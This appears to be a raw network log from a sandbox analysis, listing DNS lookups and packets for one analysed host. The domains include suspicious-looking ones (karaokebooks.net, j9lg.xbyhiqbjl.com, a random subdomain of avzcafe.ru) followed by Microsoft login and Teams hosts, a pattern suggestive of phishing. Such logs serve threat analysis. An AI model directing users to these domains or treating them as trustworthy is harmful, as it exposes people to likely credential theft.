                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:31.626511097 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:31.626585960 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:31.626591921 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:31.629319906 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:31.629386902 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:31.629395008 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:31.631429911 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:31.631505966 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:37.903722048 CET192.168.2.41.1.1.10x70d6Standard query (0)karaokebooks.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:37.903930902 CET192.168.2.41.1.1.10x9de3Standard query (0)karaokebooks.net65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:40.129569054 CET192.168.2.41.1.1.10x7381Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:40.129697084 CET192.168.2.41.1.1.10xfa5fStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:40.139461994 CET192.168.2.41.1.1.10xbc30Standard query (0)karaokebooks.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:40.139621973 CET192.168.2.41.1.1.10x58b3Standard query (0)karaokebooks.net65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:41.274924994 CET192.168.2.41.1.1.10x3088Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:41.275093079 CET192.168.2.41.1.1.10x8509Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:42.229660034 CET192.168.2.41.1.1.10x7da5Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:42.229810953 CET192.168.2.41.1.1.10x92ffStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:42.334948063 CET192.168.2.41.1.1.10x6ab9Standard query (0)j9lg.xbyhiqbjl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:42.335069895 CET192.168.2.41.1.1.10xa80dStandard query (0)j9lg.xbyhiqbjl.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:46.321269035 CET192.168.2.41.1.1.10xb077Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:46.321419954 CET192.168.2.41.1.1.10xdc40Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:46.321929932 CET192.168.2.41.1.1.10xebddStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:46.322071075 CET192.168.2.41.1.1.10x2f7Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:46.322484016 CET192.168.2.41.1.1.10xfe1dStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:46.322699070 CET192.168.2.41.1.1.10xbdcbStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:48.735898018 CET192.168.2.41.1.1.10x5536Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:48.736105919 CET192.168.2.41.1.1.10xa41aStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.271234989 CET192.168.2.41.1.1.10xa59dStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.271235943 CET192.168.2.41.1.1.10xa12aStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.284245968 CET192.168.2.41.1.1.10x9974Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.284570932 CET192.168.2.41.1.1.10x7f9dStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.056654930 CET192.168.2.41.1.1.10xa5b3Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.056807041 CET192.168.2.41.1.1.10x817bStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.426371098 CET192.168.2.41.1.1.10x3ce6Standard query (0)0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.426501989 CET192.168.2.41.1.1.10xa277Standard query (0)0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.544667959 CET192.168.2.41.1.1.10xf771Standard query (0)0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.544819117 CET192.168.2.41.1.1.10xeb10Standard query (0)0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:00:44.897083044 CET192.168.2.41.1.1.10x3f1aStandard query (0)teams.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:00:44.897211075 CET192.168.2.41.1.1.10x3d54Standard query (0)teams.nel.measure.office.net65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:00:58.801603079 CET192.168.2.41.1.1.10xdc76Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:00:58.801755905 CET192.168.2.41.1.1.10x8974Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:00:58.890290022 CET192.168.2.41.1.1.10x5d01Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:00:58.890662909 CET192.168.2.41.1.1.10xde33Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:01.624587059 CET192.168.2.41.1.1.10x459fStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:01.624860048 CET192.168.2.41.1.1.10xe297Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:04.780040026 CET192.168.2.41.1.1.10x1990Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:04.780226946 CET192.168.2.41.1.1.10x34daStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:12.074917078 CET192.168.2.41.1.1.10x5c60Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:12.075134993 CET192.168.2.41.1.1.10xda73Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:14.845824003 CET192.168.2.41.1.1.10xad57Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:14.845958948 CET192.168.2.41.1.1.10x43fdStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:39.689227104 CET192.168.2.41.1.1.10x8d49Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:39.689419985 CET192.168.2.41.1.1.10x90a8Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:46.830193043 CET192.168.2.41.1.1.10x7380Standard query (0)teams.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:46.830599070 CET192.168.2.41.1.1.10xf01cStandard query (0)teams.nel.measure.office.net65IN (0x0001)false
                                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:38.348365068 CET1.1.1.1192.168.2.40x70d6No error (0)karaokebooks.net69.49.245.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:38.348365068 CET1.1.1.1192.168.2.40x70d6No error (0)karaokebooks.net15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:38.348365068 CET1.1.1.1192.168.2.40x70d6No error (0)karaokebooks.net3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:40.267610073 CET1.1.1.1192.168.2.40x7381No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:40.267610073 CET1.1.1.1192.168.2.40x7381No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:40.271359921 CET1.1.1.1192.168.2.40xfa5fNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:40.277725935 CET1.1.1.1192.168.2.40xbc30No error (0)karaokebooks.net15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:40.277725935 CET1.1.1.1192.168.2.40xbc30No error (0)karaokebooks.net3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:40.277725935 CET1.1.1.1192.168.2.40xbc30No error (0)karaokebooks.net69.49.245.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:41.413933039 CET1.1.1.1192.168.2.40x8509No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:41.414098978 CET1.1.1.1192.168.2.40x3088No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:42.371808052 CET1.1.1.1192.168.2.40x7da5No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:42.371808052 CET1.1.1.1192.168.2.40x7da5No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:42.373270988 CET1.1.1.1192.168.2.40x92ffNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:42.621663094 CET1.1.1.1192.168.2.40xa80dNo error (0)j9lg.xbyhiqbjl.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:42.622740984 CET1.1.1.1192.168.2.40x6ab9No error (0)j9lg.xbyhiqbjl.com172.67.211.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:42.622740984 CET1.1.1.1192.168.2.40x6ab9No error (0)j9lg.xbyhiqbjl.com104.21.59.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:46.463285923 CET1.1.1.1192.168.2.40x2f7No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:46.463308096 CET1.1.1.1192.168.2.40xb077No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:46.463308096 CET1.1.1.1192.168.2.40xb077No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:46.463308096 CET1.1.1.1192.168.2.40xb077No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:46.463308096 CET1.1.1.1192.168.2.40xb077No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:46.463445902 CET1.1.1.1192.168.2.40xebddNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:46.463445902 CET1.1.1.1192.168.2.40xebddNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:46.463726997 CET1.1.1.1192.168.2.40xfe1dNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:46.463726997 CET1.1.1.1192.168.2.40xfe1dNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:46.464855909 CET1.1.1.1192.168.2.40xbdcbNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:48.873100042 CET1.1.1.1192.168.2.40x5536No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:48.873100042 CET1.1.1.1192.168.2.40x5536No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:48.873100042 CET1.1.1.1192.168.2.40x5536No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:48.873100042 CET1.1.1.1192.168.2.40x5536No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.424110889 CET1.1.1.1192.168.2.40x9974No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.424110889 CET1.1.1.1192.168.2.40x9974No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.424735069 CET1.1.1.1192.168.2.40x7f9dNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.424885988 CET1.1.1.1192.168.2.40xa12aNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.509098053 CET1.1.1.1192.168.2.40xa59dNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:50.509098053 CET1.1.1.1192.168.2.40xa59dNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:58:55.197159052 CET1.1.1.1192.168.2.40xa5b3No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.876638889 CET1.1.1.1192.168.2.40xa277No error (0)0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.876724005 CET1.1.1.1192.168.2.40x3ce6No error (0)0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ru104.21.3.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:10.876724005 CET1.1.1.1192.168.2.40x3ce6No error (0)0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ru172.67.130.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.670068026 CET1.1.1.1192.168.2.40xdd68No error (0)teams.office.comtmc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.670068026 CET1.1.1.1192.168.2.40xdd68No error (0)tmc-g2.tm-4.office.comteams-office-com.s-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.671324015 CET1.1.1.1192.168.2.40x7e02No error (0)teams.office.comtmc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.671324015 CET1.1.1.1192.168.2.40x7e02No error (0)tmc-g2.tm-4.office.comteams-office-com.s-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.671324015 CET1.1.1.1192.168.2.40x7e02No error (0)teams-office-com.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.671324015 CET1.1.1.1192.168.2.40x7e02No error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.671324015 CET1.1.1.1192.168.2.40x7e02No error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.686158895 CET1.1.1.1192.168.2.40xeb10No error (0)0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.686255932 CET1.1.1.1192.168.2.40xf771No error (0)0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ru104.21.3.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:14.686255932 CET1.1.1.1192.168.2.40xf771No error (0)0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ru172.67.130.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:38.299150944 CET1.1.1.1192.168.2.40xb52eNo error (0)teams.office.comtmc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:38.299150944 CET1.1.1.1192.168.2.40xb52eNo error (0)tmc-g2.tm-4.office.comteams-office-com.s-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:38.299150944 CET1.1.1.1192.168.2.40xb52eNo error (0)teams-office-com.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:38.299150944 CET1.1.1.1192.168.2.40xb52eNo error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:38.299150944 CET1.1.1.1192.168.2.40xb52eNo error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:38.404599905 CET1.1.1.1192.168.2.40xbd66No error (0)teams.office.comtmc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:38.404599905 CET1.1.1.1192.168.2.40xbd66No error (0)tmc-g2.tm-4.office.comteams-office-com.s-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:00:45.052026987 CET1.1.1.1192.168.2.40x3f1aNo error (0)teams.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:00:45.553016901 CET1.1.1.1192.168.2.40x3d54No error (0)teams.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:00:58.939905882 CET1.1.1.1192.168.2.40xdc76No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:00:58.941116095 CET1.1.1.1192.168.2.40x8974No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:00:59.037182093 CET1.1.1.1192.168.2.40xde33No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:00:59.037317038 CET1.1.1.1192.168.2.40x5d01No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:01.762141943 CET1.1.1.1192.168.2.40x459fNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:01.762141943 CET1.1.1.1192.168.2.40x459fNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:01.762141943 CET1.1.1.1192.168.2.40x459fNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:01.762505054 CET1.1.1.1192.168.2.40xe297No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:01.762505054 CET1.1.1.1192.168.2.40xe297No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:04.921837091 CET1.1.1.1192.168.2.40x34daNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:04.921837091 CET1.1.1.1192.168.2.40x34daNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:05.037679911 CET1.1.1.1192.168.2.40x1990No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:05.037679911 CET1.1.1.1192.168.2.40x1990No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:05.037679911 CET1.1.1.1192.168.2.40x1990No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:07.364492893 CET1.1.1.1192.168.2.40x4933No error (0)teams.office.comtmc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:07.364492893 CET1.1.1.1192.168.2.40x4933No error (0)tmc-g2.tm-4.office.comteams-office-com.s-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:07.364492893 CET1.1.1.1192.168.2.40x4933No error (0)teams-office-com.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:07.364492893 CET1.1.1.1192.168.2.40x4933No error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:07.364492893 CET1.1.1.1192.168.2.40x4933No error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:07.365839005 CET1.1.1.1192.168.2.40x33eaNo error (0)teams.office.comtmc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:07.365839005 CET1.1.1.1192.168.2.40x33eaNo error (0)tmc-g2.tm-4.office.comteams-office-com.s-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:12.213620901 CET1.1.1.1192.168.2.40x5c60No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:12.315366983 CET1.1.1.1192.168.2.40xda73No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:14.986829042 CET1.1.1.1192.168.2.40xad57No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:14.986829042 CET1.1.1.1192.168.2.40xad57No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:14.986829042 CET1.1.1.1192.168.2.40xad57No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:14.989547968 CET1.1.1.1192.168.2.40x43fdNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:14.989547968 CET1.1.1.1192.168.2.40x43fdNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:15.431266069 CET1.1.1.1192.168.2.40x5726No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:15.431266069 CET1.1.1.1192.168.2.40x5726No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:36.745727062 CET1.1.1.1192.168.2.40x92a0No error (0)shed.dual-low.s-part-0015.t-0009.t-msedge.nets-part-0015.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:36.745727062 CET1.1.1.1192.168.2.40x92a0No error (0)s-part-0015.t-0009.t-msedge.net13.107.246.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:39.826880932 CET1.1.1.1192.168.2.40x8d49No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:39.827037096 CET1.1.1.1192.168.2.40x90a8No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:46.970752954 CET1.1.1.1192.168.2.40xf01cNo error (0)teams.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
